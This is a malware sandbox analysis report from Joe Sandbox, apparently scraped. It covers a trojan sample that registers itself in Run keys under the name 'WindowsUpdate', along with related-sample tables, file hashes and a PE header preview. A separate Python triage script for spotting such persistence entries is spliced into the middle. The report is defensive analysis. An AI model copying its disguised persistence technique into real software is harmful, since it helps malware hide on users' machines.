https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://word.office.com | explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://android.notify.windows.com/iOSJM | explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://powerpoint.office.com | explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://outlook.com | explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c | explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://android.notify.windows.com/iOSZM | explorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp | false | | high
                                                                                                    high
                                                                                                    https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-fexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-woexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.yelp.comexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://www.msn.com:443/en-us/feedexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hIexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://api.msn.com/v1/news/Feed/Windows?z$explorer.exe, 00000020.00000002.3833424525.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.0000000008685000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-darkexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  high
No contacted IP infos
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1569431
Start date and time:2024-12-05 19:01:04 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 12m 29s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:32
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:FX6KTgnipP.exe
renamed because original name is a hash value
Original Sample Name:6d414885d7f75777705948ed9a7134421d7cc2eabb4c4591b913864e8642850a.exe
Detection:MAL
Classification:mal100.troj.evad.winEXE@40/50@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 195
• Number of non-executed functions: 214
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.182.143.212
• Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: FX6KTgnipP.exe
Time | Type | Description
13:02:15 | API Interceptor | 1x Sleep call for process: FX6KTgnipP.exe modified
13:03:38 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
13:04:07 | API Interceptor | 4867854x Sleep call for process: UserAccountControlSettings.exe modified
13:05:53 | API Interceptor | 38x Sleep call for process: explorer.exe modified
18:02:21 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
18:02:35 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
18:02:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
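Added example, not part of the Joe Sandbox report: a small Python triage of Run-key entries in the shape of the three Autostart lines above. It parses each "hive\key value-name command" line, separates the executable from its arguments, and flags the indicators visible in this sample: a launch path under a user-writable folder, an 8.3 short-name component (DMQIUO~1.EXE), a value name that mimics a Windows component, and a non-executable file from the same folder passed as an argument (the AutoIt stub plus script pattern). The fourth, benign entry, the scoring policy and the impersonated-name list are this example's own assumptions, not anything the report states.

```python
"""Triage of Run-key autostart entries (added example, not Joe Sandbox code)."""
import ntpath
import re
from dataclasses import dataclass, field

# Constructed input: the three Autostart lines from the timeline, copied
# verbatim, plus one benign entry (SecurityHealth) invented for contrast.
AUTOSTART_ENTRIES = [
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin",
    r"HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run SecurityHealth C:\Windows\System32\SecurityHealthSystray.exe",
]

# "<hive\key> <value name> <command line>"; assumes the value name has no
# spaces (a real registry walk gets name and data as separate fields).
RUN_ENTRY = re.compile(r"^(?P<key>\S+)\s+(?P<name>\S+)\s+(?P<cmd>.+)$")

# Folders any standard user can write to; a Run value launching from one of
# them needs no privilege to plant and survives a reboot.
USER_WRITABLE = re.compile(
    r"\\(AppData\\(Local|Roaming)|ProgramData|Users\\Public|Windows\\Temp)\\",
    re.IGNORECASE,
)
# An 8.3 short-name path component such as DMQIUO~1.EXE.
SHORT_COMPONENT = re.compile(r"^[^~\\]{1,6}~\d+(\.[^.\\]{1,3})?$", re.IGNORECASE)
# Value names that mimic Windows components (assumed, deliberately short list).
IMPERSONATED_NAMES = {"windowsupdate", "windowsdefender", "svchost", "explorer", "microsoftupdate"}
NATIVE_EXTENSIONS = {".exe", ".dll", ".com", ".scr"}


@dataclass
class Finding:
    key: str
    name: str
    executable: str
    arguments: list = field(default_factory=list)
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Assumed policy: a user-writable launch path is enough on its own,
        # otherwise require two independent indicators.
        return "user_writable_path" in self.reasons or len(self.reasons) >= 2


def split_command(cmd: str):
    """Return (executable, [arguments]); honours a double-quoted executable path."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        if end == -1:
            raise ValueError("unterminated quote in command line")
        return cmd[1:end], cmd[end + 1:].split()
    parts = cmd.split()
    return parts[0], parts[1:]


def analyze(entry: str) -> Finding:
    """Parse one Run entry and attach every indicator that applies, in a fixed order."""
    m = RUN_ENTRY.match(entry.strip())
    if not m:
        raise ValueError(f"not a Run entry: {entry!r}")
    exe, args = split_command(m["cmd"])
    f = Finding(key=m["key"], name=m["name"], executable=exe, arguments=args)

    if USER_WRITABLE.search(exe):
        f.reasons.append("user_writable_path")
    if any(SHORT_COMPONENT.match(part) for part in exe.split("\\")):
        f.reasons.append("short_name_path")
    if m["name"].replace(" ", "").lower() in IMPERSONATED_NAMES:
        f.reasons.append("impersonating_value_name")
    # Interpreter-plus-script shape: a non-native file from the executable's own
    # folder handed to it as an argument (here the AutoIt stub and its .bin).
    exe_dir = ntpath.dirname(exe).lower()
    for a in args:
        if "\\" in a and ntpath.dirname(a).lower() == exe_dir:
            if ntpath.splitext(a)[1].lower() not in NATIVE_EXTENSIONS:
                f.reasons.append("script_argument")
                break
    return f


def group_by_target(entries) -> dict:
    """Collapse the same (value name, executable) written under several hives into one group."""
    groups = {}
    for e in entries:
        f = analyze(e)
        groups.setdefault((f.name, f.executable.lower()), []).append(f)
    return groups


if __name__ == "__main__":
    for (name, exe), fs in group_by_target(AUTOSTART_ENTRIES).items():
        verdict = "SUSPICIOUS" if fs[0].suspicious else "ok"
        hives = ", ".join(f.key.split("\\")[0] for f in fs)
        print(f"{verdict:10} {name:15} {exe}  [{hives}]  {fs[0].reasons}")
```

Grouping by value name and executable is what turns the three timeline rows into one finding: the HKLM, HKCU and HKCU64 writes are one persistence mechanism recorded in three hives, and a report that counts them as three separate autostarts overstates the foothold.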
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
s-part-0035.t-0009.t-msedge.net | file.exe | Get hash | malicious | Orcus, PureLog Stealer | Browse | 13.107.246.63
 | bmXYSTLHjA.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 13.107.246.63
 | tegga.hta | Get hash | malicious | Xmrig | Browse | 13.107.246.63
 | 17334181261974bf64e3aa3bbac8bf525f91f1e7e877c7dc9d79fa20f782fc960f960876a5125.dat-decoded.exe | Get hash | malicious | AsyncRAT | Browse | 13.107.246.63
 | 1733418140de6eff55fb568a29814debaf3ad46ee7119730b1019aa5b47c07d232cf03fefd427.dat-decoded.exe | Get hash | malicious | AsyncRAT | Browse | 13.107.246.63
 | 8WLOyt9f86.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 13.107.246.63
 | 17334181364071403cdc067ba1fc9ab2f8f7271b4a46f441520951e9988bd247070aee405c380.dat-decoded.exe | Get hash | malicious | AsyncRAT | Browse | 13.107.246.63
 | file.exe | Get hash | malicious | LummaC Stealer | Browse | 13.107.246.63
 | https___files.catbox.moe_l2rczc.pif.exe | Get hash | malicious | Unknown | Browse | 13.107.246.63
 | ECtxws3Hug.exe | Get hash | malicious | Unknown | Browse | 13.107.246.63
No context
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2.exe | uhbrQkYNzx.exe | Get hash | malicious | FormBook | Browse |
 | qPLzfnxGbj.exe | Get hash | malicious | FormBook | Browse |
 | ngPebbPhbp.exe | Get hash | malicious | RHADAMANTHYS | Browse |
 | FS04dlvJrq.exe | Get hash | malicious | FormBook | Browse |
 | M1Y6kc9FpE.exe | Get hash | malicious | FormBook | Browse |
 | mJIvCBk5vF.exe | Get hash | malicious | FormBook | Browse |
 | lcbF0sywlU.exe | Get hash | malicious | FormBook | Browse |
 | 1aG5DoOsAW.exe | Get hash | malicious | FormBook | Browse |
 | Factura-2410-CFDI.bat | Get hash | malicious | Unknown | Browse |
 | DGFmCcZnM0.exe | Get hash | malicious | FormBook | Browse |
C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | uhbrQkYNzx.exe | Get hash | malicious | FormBook | Browse |
 | qPLzfnxGbj.exe | Get hash | malicious | FormBook | Browse |
 | ngPebbPhbp.exe | Get hash | malicious | RHADAMANTHYS | Browse |
 | FS04dlvJrq.exe | Get hash | malicious | FormBook | Browse |
 | M1Y6kc9FpE.exe | Get hash | malicious | FormBook | Browse |
 | mJIvCBk5vF.exe | Get hash | malicious | FormBook | Browse |
 | lcbF0sywlU.exe | Get hash | malicious | FormBook | Browse |
 | 1aG5DoOsAW.exe | Get hash | malicious | FormBook | Browse |
 | Factura-2410-CFDI.bat | Get hash | malicious | Unknown | Browse |
 | DGFmCcZnM0.exe | Get hash | malicious | FormBook | Browse |
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.6477405974724811
Encrypted:false
SSDEEP:96:a0Fe3yMd5k8lacsoFWC/bE6tQXIDcQvc6QcEVcw3cE/OsF+HbHsZAX/d5FMT2SlQ:b0Cy5k8QcS0BU/IjlzuiFKZ24IO8L
MD5:FA2C0221134C27E7C9BCAFE2AF2E488B
SHA1:ED2D6547343A039924048E52F964F71FF5B79C2B
SHA-256:286B14334868B139400029C493B8ED1033C341E703BA9B76E4F20581D319856E
SHA-512:D721E12845BD747B9977A3776F05A401B16395E96C94D0AB280906B606EB4DC7F2601C1429AF267D064A826955EE0F3C3BCCA5D2561633BB905A50F8630AC00C
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 18:03:26 2024, 0x1205a4 type
Category:dropped
Size (bytes):18890
Entropy (8bit):2.0354756181850053
Encrypted:false
SSDEEP:96:5785prpHhRtpte+MCsi7UiiV4H64dQa/zPMMMZp/8cWIkWIXTIxAMw:qjrpVpBiOs4HtdQM7MMCkoAl
MD5:13012FDB5478D442041FAC575BD79827
SHA1:3C271B03E620D93C06EE5D2F4AF8B5172280EED3
SHA-256:E195B3AC995CDB3F56E7A466BA13AA71A47F7C7C9C52FF21D5F5D425D810922A
SHA-512:1C58A7D8492934E5F92FB2DFCE627BC38D614D52D43819BD5623CABDB8706B3B0F586726960A14E28897435A5CD4F88E01C7396C10682891FE83548D6410D4A5
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8324
Entropy (8bit):3.6936330466973586
Encrypted:false
SSDEEP:192:R6l7wVeJCQ6Biw6YwS6tpGgmfkGprX89buFsfIK6m:R6lXJF6Bt6Yd6ygmfkTuefIO
MD5:A812FA474B5B28110ECFC1EB71AA799C
SHA1:8E0C57D440E3A57E2F48DD62FC016DF7BC0CD1BD
SHA-256:22FA02DB764E589C4A0B30AB998F7EB3465B7A7C1D4DE3BDC800AC2B0751D5F0
SHA-512:B43546B54F4B852ADD3170F4537E1489BEF268E791D78D7650B05DA7213494679D50F8F1AEBCE3FBB9E87A8D35ED116F4242146736F3B044315F878EDA0EDA23
Malicious:false
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4736
Entropy (8bit):4.440981623082431
Encrypted:false
SSDEEP:48:cvIwWl8zsZqJg77aI9RLSWpW8VY9Ym8M4JbrFgKo+q8vRJmDIxd:uIjfCI7HLz7VFJ6KoKHmDIxd
MD5:E0CE4C9A991D8F2F08735CBEF19712A2
SHA1:A55043E9DCD349FA8696CC68BAC90DE66635AE3C
SHA-256:3D71AB0A8B06B8AE8C8FA7CCF256BB6C0D64DC953FC1962FB50580046A1513B6
SHA-512:E87DC096CEB50D5F4DD420C28C08ED6DC87A69CB373D4E5B331BBAAD6B8077E5F9C85B7C8D88CFFE31EC211D072DE6A6F318132E9050C87E4B540E15A7657DA0
Malicious:false
Process:C:\Users\user\Desktop\FX6KTgnipP.exe
File Type:ASCII text, with very long lines (65536), with no line terminators
Category:dropped
Size (bytes):571495
Entropy (8bit):4.050101452531791
Encrypted:false
SSDEEP:6144:S8+nw3X1oeYXD39Gp74IazTb9A/OZBWxCcY5Nydt:sRe+DtU7FapA/Ork
MD5:4F363A080CC5B7DF87865134BEA5A5A8
SHA1:186AE3A77464644CDA4D0088F2FE47CADA63C411
SHA-256:3EB7D48ECC57056FD63D437C73E2D97004D83C3F81D9D12FD59F9BD02BAEB47F
SHA-512:C35F1CE633482418B2FD23D6FAA4FCEB118F90C9C08106E5DAF5E65DFFF81F73FC1B76BFE910A1B3C861EAA3614C07A9A50745A4226FB775C0D7D05FF1D8FAEC
Malicious:false
Process:C:\Users\user\Desktop\FX6KTgnipP.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):511
Entropy (8bit):5.583899771066972
Encrypted:false
SSDEEP:12:huQQOtj+dGlIPpUbLUFfw6CaVWrYjlDQQ8DfGvebBPc:hQOtjvlKU/5CESeQ8D+mO
MD5:9A38130722412B3DA7C8F01FA3951543
SHA1:E6E5082B8258ABF0E4DE8FA3A9D78FED8113F59C
SHA-256:1FF428831F3EE3453A0AAD13851CCDA311A940876D94000AE62D499108C96A19
SHA-512:C73C6634394D94EB71F54E4B3A1EA1E36167FD6EB9110FB55588DBB84C774B3449BDF00B337E8B6C0EE6DA84D85C03A2F40484961952C159CF1EC5FFB765DB99
Malicious:false
Process:C:\Users\user\Desktop\FX6KTgnipP.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):537
Entropy (8bit):5.704572179774912
Encrypted:false
SSDEEP:12:xN2Al1FkxT2BjNPEkcmXKw1fV412W/hiUnxHja:72AvGxmjJEkF6Gte/hiUn0
MD5:24BE41947CD248379C4BF3376C7B512D
SHA1:D672DCAD8399813B4D725A4FACBEDF7C06C232C9
SHA-256:FBE9B125387CEE3486E264D3181353BFFDD19DBE3D5CCB727A64EF8A10226F12
SHA-512:EF3636C77ACB4BE60CCBD282A0C18CEC38C295FEC56DD0571CCF21E429145F697023B805A1D62385558907B632A3DB0A3EB66B2FD1B96DB85577498D53C35B2E
Malicious:false
Process:C:\Users\user\Desktop\FX6KTgnipP.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):947288
Entropy (8bit):6.629681466265794
Encrypted:false
SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
MD5:0ADB9B817F1DF7807576C2D7068DD931
SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: uhbrQkYNzx.exe, Detection: malicious
• Filename: qPLzfnxGbj.exe, Detection: malicious
• Filename: ngPebbPhbp.exe, Detection: malicious
• Filename: FS04dlvJrq.exe, Detection: malicious
• Filename: M1Y6kc9FpE.exe, Detection: malicious
• Filename: mJIvCBk5vF.exe, Detection: malicious
• Filename: lcbF0sywlU.exe, Detection: malicious
• Filename: 1aG5DoOsAW.exe, Detection: malicious
• Filename: Factura-2410-CFDI.bat, Detection: malicious
• Filename: DGFmCcZnM0.exe, Detection: malicious
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                          Entropy (8bit):6.629681466265794
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                                                                                          MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                                          SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                                                                                          SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                                                                                          SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: uhbrQkYNzx.exe, Detection: malicious
                                                                                                                                                                          • Filename: qPLzfnxGbj.exe, Detection: malicious
                                                                                                                                                                          • Filename: ngPebbPhbp.exe, Detection: malicious
                                                                                                                                                                          • Filename: FS04dlvJrq.exe, Detection: malicious
                                                                                                                                                                          • Filename: M1Y6kc9FpE.exe, Detection: malicious
                                                                                                                                                                          • Filename: mJIvCBk5vF.exe, Detection: malicious
                                                                                                                                                                          • Filename: lcbF0sywlU.exe, Detection: malicious
                                                                                                                                                                          • Filename: 1aG5DoOsAW.exe, Detection: malicious
                                                                                                                                                                          • Filename: Factura-2410-CFDI.bat, Detection: malicious
                                                                                                                                                                          • Filename: DGFmCcZnM0.exe, Detection: malicious
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):47623
                                                                                                                                                                          Entropy (8bit):5.5696126200975
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:CT5tWoBE30tQsOCnLiStoWanGJ23TU4RyOGUgmyU1n4dwo5+q1mbavxFq:CdtWmO+7OFEWRyP24yn
                                                                                                                                                                          MD5:5EF7B0C766266BC97D8AF8F4504F88E0
                                                                                                                                                                          SHA1:4F1C70B893DD0C101741030EE4ABCDFF8E5F3F90
                                                                                                                                                                          SHA-256:D13CA0EFA0973C4C475B6AC4E1B0DE49AEB9ED45AA1A703E8E473E28D6D885AC
                                                                                                                                                                          SHA-512:F75F0CAB7FE9F2550E601774A38D881CFD7A0AD329A17B9D6AEB333E98E026D928D89B42919FE606F416CADD1309438CB204741675B011D1E62AF5357674D833
                                                                                                                                                                          Malicious:false
